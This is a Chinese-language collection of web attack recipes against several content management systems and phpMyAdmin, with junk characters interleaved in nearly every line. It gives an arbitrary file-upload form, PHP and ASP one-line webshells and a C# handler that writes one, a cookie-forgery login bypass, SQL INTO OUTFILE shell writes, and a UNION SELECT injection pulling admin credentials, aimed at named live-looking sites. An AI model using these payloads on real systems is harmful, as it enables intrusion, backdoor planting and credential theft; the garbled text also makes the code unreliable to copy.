% @7 C9 R3 ~# ?9 A. a5 }如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
& @+ m T# I5 G<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">+ z% |) R8 L3 O/ B' [# ?4 g
Upload a new file:<br>( V( \' P2 ~6 l. b4 T9 Y1 \
<input type="file" name="NewFile" size="50"><br>
4 t3 f" D; o/ {8 a. f<input id="btnUpload" type="submit" value="Upload">0 z' g& y8 |3 J: c _: h( d
</form>) D \ }5 V' @8 e% D" ]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 Y! L. J; r" E5 C4 C
* e& b0 z4 B& pSDcms 后台拿webshell
( j7 D9 R. Y7 G5 r
# v& R. |6 y' \7 R. i H* Z1 @- o第一种方法:$ ?* w' q. s( v" z% H
进入后台-->系统管理-->系统设置-->系统设置->网站名称;$ h1 i' ^4 ]& s) ~1 B
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
$ g+ m5 K) z. @$ W) ?' m用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。/ z2 w! D& l1 Y- T9 \' X
第二种方法:5 N, M1 w5 f% W" Z: Q+ l8 R
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
( [9 e5 j; H9 ~' Z在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
# g5 E4 a2 I' T! U5 {8 a- J, \第三种方法:
; i( ^/ H, M+ n8 q5 D进入后台-->界面管理-->模板文件管理-->创建文件
7 X( ~2 a* H+ N u/ l1 m$ c* X文件名写入getshell.ashx
; o/ u6 L) i9 D" R7 E内容写入下面内容:, @ O- {* j! i+ L* h: H: ~1 H$ `
/====================复制下面的=========================/& _$ w+ y+ R' X6 S' o1 ^+ g' _- t( O
<%@ WebHandler Language="C#" Class="Handler" %>9 Z$ {5 j: b" H! S
using System;
6 O4 g, c0 j: E7 nusing System.Web;( c2 m+ c' J2 ?: J8 M n- i
using System.IO;
( T3 L& ?* Q$ j/ `: M6 spublic class Handler : IHttpHandler {6 Z3 P- X/ {4 E: I# I% s
public void ProcessRequest (HttpContext context) {- j2 n% ?9 |# V0 {) Z; @" a, V
context.Response.ContentType = "text/plain";6 O7 @- a9 a+ u7 ^( v/ q; L
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));2 [' G7 }4 w s" P( a
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");7 O) g! K M+ ], p* S' U2 W8 H) y
file1.Flush();
. P! R0 n' I- J7 S3 sfile1.Close();
4 O J0 h0 o& n4 A `}$ c! M% S" u( a2 O3 R3 I$ Y
public bool IsReusable {
6 F+ ]5 X9 Q- m( K; V2 ]" E& lget {8 p- U' r6 \* U
return false;% v6 h' s f& _% X; @
}
]2 R6 t$ ]+ k}, y4 W! a4 e% f+ F b* ^9 }2 j
}" C- T# h3 p9 v0 c
/=============================================/" M W* M; T7 ?% }1 ^; f1 M+ k8 A
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx1 D4 w& {8 [$ T @
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接3 A# x/ m T8 G q, w' m
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 ]9 r: K1 O6 z, K5 r2 N2 X3 O! o# R7 O' k" C$ |+ L
ESCMS网站管理系统0day; P7 ~- h9 s8 o9 M0 g+ r: V9 m- Z5 g
7 y! h4 c9 d: L8 q* m后台登陆验证是通过admin/check.asp实现的% D1 `9 C0 z" f( x, D+ u* L9 s
% y2 w8 Y- N% @# `+ v首先我们打开http://target.com/admin/es_index.html
9 {! m$ l3 `2 C3 x然后在COOKIE结尾加上) R( l2 F% y* U. C0 X+ ^
; ESCMS$_SP2=ES_admin=st0p;
/ K! K' l: b0 w9 F5 r修改,然后刷新1 ~% _. i# ?: Z( Y- m. N6 E8 l
进后台了嘎..* G8 t+ o Y3 y1 Z9 K/ x$ z
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
, y0 Q9 L8 o& ]. Y
3 ?8 L) Z6 q+ O- W利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.$ V2 b- c+ D9 {3 R- n2 f
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp6 q$ k3 C+ s3 ?
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..6 H9 L5 T& P$ j; Y z
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了' Q* B5 F9 {! n" Z5 _3 G
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# _' m' `6 [/ Q3 s
4 c' t* s. j$ W0 @! a+ d$ F4 `
宁志网站管理系统后台无验证漏洞及修复
6 W$ R3 O! z* D5 G( d
u! h8 [/ C) r7 u: F2 I网上搜了一下,好像没有发布.如有雷同纯粹巧合!% M0 c- @5 ^* O$ F
官方网站:www.ningzhi.net
- L* |- h1 J7 R7 h学校网站管理系统 V.2011版本 2 I+ e- E `/ i& v( f' T l
http://down.chinaz.com/soft/29943.htm
) f% V# t: y' _+ e6 n, U其它版本(如:政府版等),自行下载.4 Z" ]/ g+ A% L% o
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~+ G" B9 N. `! G) u" ^9 s6 ^& F; i
login.asp代码如下:: E# g W: {+ C
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> - V; d, Q, n5 ~3 c* |( ]4 p/ ]
manage.asp代码我就不帖出来了.反正也没验证./ y8 ?5 k2 V8 P3 c
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
- t. I) I$ v8 s' s漏洞利用:/ x9 m) B8 N! b, f. [6 F7 ]
直接访问http://www.0855.tv/admin/manage.asp: @# T5 y. P2 p9 @" R, z8 d! N
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5) t8 G& |+ o* H) F! d% A" X: B
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 `" j1 G% `/ \6 r8 X4 V5 W
9 w4 T6 \$ }6 @4 s5 n* i
phpmyadmin拿shell的四种方法总结及修复! b& n% ?9 n0 t; P9 i2 z
2 V S% W9 Y( t+ G方法一:
* M! _: j! P/ {9 UCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );( T5 I' e( f9 L3 E* S, E( H" w" f+ T
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
6 j9 l6 o9 D' b) V$ K4 y6 ^! s1 tSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
" @( `" b6 ~3 M4 y7 o: t----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
2 E. \+ q; N1 U" ]/ a; ^# |. ] 一句话连接密码:7on
% ]1 A' ?* L+ D方法二:
& t0 t7 R6 Z8 h1 z# g读取文件内容: select load_file('E:/xamp/www/s.php');
: o' B# Z1 z N9 p( \' @5 G写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'; e4 q' v" F3 y
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'' P$ [2 u2 Y( I
方法三:8 l3 \( K d6 X; T- j6 p) l
JhackJ版本 PHPmyadmin拿shell w# `# y/ L C& {" f" G+ Y* a& k5 {
Create TABLE study (cmd text NOT NULL);/ [& r0 W+ O! n, c/ \; U `
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');8 P9 t- i: I" U( e! B1 S
select cmd from study into outfile 'E:/wamp/www/7.php';, v4 q' v' G T1 m0 @4 n. O2 m
Drop TABLE IF EXISTS study;1 d0 _% h s9 Y! t6 R0 s2 Y
<?php eval($_POST[cmd])?>
: L2 y9 p( t$ a4 C4 t! J& _3 yCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。. t5 h% b5 g- r5 \, e$ I
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
* Z8 J0 m* E; a. G# p+ wSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
: v, @+ Z5 E3 _3 T# v* UDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
5 ^5 Q! S# ` y4 o6 B. ~方法四:0 H0 j1 S y. G6 F9 o2 u
select load_file('E:/xamp/www/study.php'); H' r2 L0 O! ^( M; x2 T1 a' k
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php' {. G: k* l; O: M e( G- `$ q
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir; S; X4 P }; V) W
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 ^6 s9 Y( y# f! }: S7 I; u- ^
" M/ K& T" l, t: l- oNO.001中学网站管理系统 Build 110628 注入漏洞
. a# C7 Q/ \* U) K7 H/ t( Y9 g. ~* |) ?) o$ q7 F
NO.001中学网站管理系统功能模块:
" |4 L& @! K2 ^* F+ Y1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等 r k0 X- [3 l# }: x$ w) S
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
& ]. `; Q# ^. ^1 x7 G5 P3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息$ t( l/ u. ?% E. y" D# a
4.视频图片管理:一级分类,动态添加视频或者图片等信息- h* V3 E0 ]- i5 n1 h' X
5.留言管理:对留言,修改,删除、回复等管理4 h e, o& q0 T$ G. k' Q5 o
6.校友频道:包括校友资料excel导出、管理等功能1 K! X# |1 i- Z) o; N, R
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
; M, d0 ^+ n J) n8 l; }. n. L默认后台:admin/login.asp' G8 i4 ^* l( `/ Z3 Y/ g, |
官方演示:http://demo.001cms.net
) v' M: b$ u+ s. X$ b2 T8 J& A源码下载地址:http://down.chinaz.com/soft/30187.htm
) M3 C/ G% S9 Y. h( nEXP:
8 J |5 I$ t, Q0 W1 }: e0 ?union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
, n1 U$ C$ Z8 D ]) f测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin7 M" n4 Y' f/ v: _2 } x3 n9 z
getshell:后台有备份,你懂的
" t; C5 I0 a/ y E另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。1 q% u% ] K0 u9 ~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |